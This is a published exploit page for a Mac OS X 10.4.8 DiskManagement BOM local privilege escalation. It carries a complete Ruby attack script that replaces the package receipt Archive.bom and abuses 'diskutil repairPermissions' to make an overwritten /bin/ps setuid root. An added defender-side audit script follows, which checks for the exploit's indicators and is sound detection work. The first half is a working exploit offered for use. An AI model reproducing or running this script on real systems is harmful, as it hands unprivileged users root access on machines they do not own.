Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit
Source: lmh [at] info-pull.com   Author: LMH   Published: 2007-01-08

#!/usr/bin/ruby
# (c) 2006 LMH <lmh [at] info-pull.com>
# Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# Thanks to The French Connection for bringing this in-the-wild 0-day to
# our attention. If /tmp/ps2 exists on your system, you've been pwned already.
# Thanks to the original authors of the exploit ('meow'). You know who you are.
#
# "They did it for the lulz" - A Fakecure spokesperson on the 'Mother Of all Bombs'.
# "kcoc kcus I ro tcarter uoY" - The Original Drama P3dobear (Kumo' n').
#

require 'fileutils'

# Basic configuration
TARGET_BINARY = "/bin/ps" # Changing this requires you to create a new TEH_EVIL_BOM
TARGET_BACKUP_PATH = "/tmp/ps2" # see: "man lsbom" and "man mkbom"
TARGET_SHELL_PATH = "/usr/bin/id" # Ensure the binary doesn't drop privileges!
BOMARCHIVE_PATH = "/Library/Receipts/Essentials.pkg/Contents/Archive.bom"
DISKUTIL_PATH = "/usr/sbin/diskutil"
TEH_EVIL_BOM = File.read("Evil.bom")

#
# Repair a rogue installation using the back-up files. Useful for testing.
# Probably you don't want to repair on real pwnage... :-)
#
def do_repair()
  puts "++ Repairing (moving back-ups to original path)"
  puts "++ #{File.basename(BOMARCHIVE_PATH)}"
  FileUtils.rm_f BOMARCHIVE_PATH
  FileUtils.cp File.join("/tmp", File.basename(BOMARCHIVE_PATH)), BOMARCHIVE_PATH

  puts "++ #{TARGET_BINARY}"
  FileUtils.rm_f TARGET_BINARY
  FileUtils.cp TARGET_BACKUP_PATH, TARGET_BINARY

  puts "++ Removing back-ups..."
  FileUtils.rm_f TARGET_BACKUP_PATH
  FileUtils.rm_f File.join("/tmp", File.basename(BOMARCHIVE_PATH))

  puts "++ Done. Repairing disk permissions..."
  exec "#{DISKUTIL_PATH} repairPermissions /"
end

#
# Overwrite TARGET_BINARY with TARGET_SHELL_PATH and set the rogue permissions unless
# they are already properly set.
#
def exploit_bomb()
  puts "++ We get signal. Overwriting #{TARGET_BINARY} with #{TARGET_SHELL_PATH}."

  # Overwriting with this method will always work well if binary at TARGET_SHELL_PATH
  # is bigger than TARGET_BINARY (ex. /bin/sh is 1068844 bytes and /bin/ps is 68432).
  # An alternative method is running diskutil again to set the rogue permissions.
  over = File.new(TARGET_BINARY, "w")
  over.write(File.read(TARGET_SHELL_PATH))
  over.close

  unless FileTest.setuid?(TARGET_BINARY)
    fork do
      FileUtils.rm_f TARGET_BINARY
      FileUtils.cp TARGET_SHELL_PATH, TARGET_BINARY
      exec "#{DISKUTIL_PATH} repairPermissions /"
    end
    Process.wait
  end

  puts "++ Done. Happy ruuting."
end

#
# Overwrite the BOM with the rogue version, set new permissions.
#
def set_up_the_bomb()
  puts "++ Preparing to overwrite (#{BOMARCHIVE_PATH})"

  # Back-up the original Archive.bom, set mode to 777
  if FileTest.writable?(BOMARCHIVE_PATH)
    backup_path = File.join("/tmp", File.basename(BOMARCHIVE_PATH))

    # FileTest.exist? (the original used the alias exists?, removed in Ruby 3.2)
    unless FileTest.exist?(backup_path)
      puts "++ Creating backup copy at #{backup_path}"
      FileUtils.cp BOMARCHIVE_PATH, backup_path
    end

    puts "++ Removing original file."
    FileUtils.rm_f BOMARCHIVE_PATH

    puts "++ Writing backdoor BOM file."
    target_bom = File.new(BOMARCHIVE_PATH, "w")
    target_bom.write(TEH_EVIL_BOM)
    target_bom.close
    puts "++ Done."
  else
    puts "-- Can't write to '#{BOMARCHIVE_PATH}'. No pwnage for you today."
    exit
  end

  # Back-up the target backdoor path
  unless FileTest.exist?(TARGET_BACKUP_PATH)
    puts "++ Creating backup copy of #{TARGET_BINARY} at #{TARGET_BACKUP_PATH}"
    FileUtils.cp TARGET_BINARY, TARGET_BACKUP_PATH
  end

  # Let diskutil do its job (set permissions over target binary path, setuid)
  puts "++ Running diskutil to set the new permissions for the backdoor..."
  fork do
    exec "#{DISKUTIL_PATH} repairPermissions /"
  end
  Process.wait

  puts "++ Somebody set up us the bomb!"
  exploit_bomb()
end

# Here be pwnies
if ARGV[0] == "repair"
  do_repair()
else
  set_up_the_bomb()
end
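The conditions this exploit depends on and the artefacts it leaves behind (a receipt BOM that a non-root user can write, the /tmp/ps2 backup copy the header comment names as the sign of compromise, and a setuid bit on /bin/ps) are what a defender would check for. The following Ruby audit is an added example, not part of LMH's exploit or of any Apple tooling; the paths are the ones named in the script above, while the entry-hash layout, the Finding struct and the helper names are this example's own convention.

```ruby
#!/usr/bin/ruby
# Added defender-side audit (not part of the exploit above). It checks the
# three indicators the exploit relies on or leaves behind, using the paths
# named in the exploit. The "entries" hash format and helper names are this
# example's own convention.

RECEIPT_BOM = "/Library/Receipts/Essentials.pkg/Contents/Archive.bom"
BACKUP_IOC  = "/tmp/ps2"
PS_BINARY   = "/bin/ps"

Finding = Struct.new(:path, :problem)

# A receipt BOM feeds "diskutil repairPermissions", so it must be owned by
# root and not writable by group or other. mode is the raw st_mode integer.
def bom_writable_by_nonroot?(uid, mode)
  uid != 0 || (mode & 0o022) != 0
end

# /bin/ps does not ship setuid; a setuid bit on it is the exploit's end state.
def suspicious_setuid?(mode)
  (mode & 0o4000) != 0
end

# entries maps a path to { exists: bool, uid: int, mode: int }, so the audit
# runs over constructed data (below) as well as over real File.stat results.
def audit(entries)
  findings = []

  bom = entries[RECEIPT_BOM]
  if bom && bom[:exists] && bom_writable_by_nonroot?(bom[:uid], bom[:mode])
    findings << Finding.new(RECEIPT_BOM,
      format("receipt BOM writable by non-root (uid=%d mode=%04o)",
             bom[:uid], bom[:mode] & 0o7777))
  end

  ioc = entries[BACKUP_IOC]
  if ioc && ioc[:exists]
    findings << Finding.new(BACKUP_IOC, "backup copy left by the exploit is present")
  end

  ps = entries[PS_BINARY]
  if ps && ps[:exists] && suspicious_setuid?(ps[:mode])
    findings << Finding.new(PS_BINARY,
      format("unexpected setuid bit (mode=%04o)", ps[:mode] & 0o7777))
  end

  findings
end

# Live variant: stat the real paths and feed them to the same audit.
def stat_entry(path)
  return { exists: false } unless File.exist?(path)
  st = File.stat(path)
  { exists: true, uid: st.uid, mode: st.mode }
end

def live_audit(paths = [RECEIPT_BOM, BACKUP_IOC, PS_BINARY])
  audit(paths.map { |p| [p, stat_entry(p)] }.to_h)
end

# Constructed sample data: an untouched layout and one after the exploit ran.
CLEAN_SYSTEM = {
  RECEIPT_BOM => { exists: true,  uid: 0, mode: 0o100644 },
  BACKUP_IOC  => { exists: false },
  PS_BINARY   => { exists: true,  uid: 0, mode: 0o100555 },
}
TAMPERED_SYSTEM = {
  RECEIPT_BOM => { exists: true, uid: 0,   mode: 0o100777 },  # BOM left mode 777
  BACKUP_IOC  => { exists: true, uid: 501, mode: 0o100755 },  # /tmp/ps2 present
  PS_BINARY   => { exists: true, uid: 0,   mode: 0o104555 },  # setuid root
}

if __FILE__ == $0
  findings = live_audit
  if findings.empty?
    puts "OK: no DiskManagement/BOM tampering indicators found"
  else
    findings.each { |f| puts "WARN #{f.path}: #{f.problem}" }
  end
end
```

Run as root on the host being checked; a clean 10.4.8 system reports no findings, while a host where the script above has run trips all three checks. Restoring the original Archive.bom and re-running diskutil repairPermissions (as the exploit's own "repair" mode does) is what clears the setuid bit.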
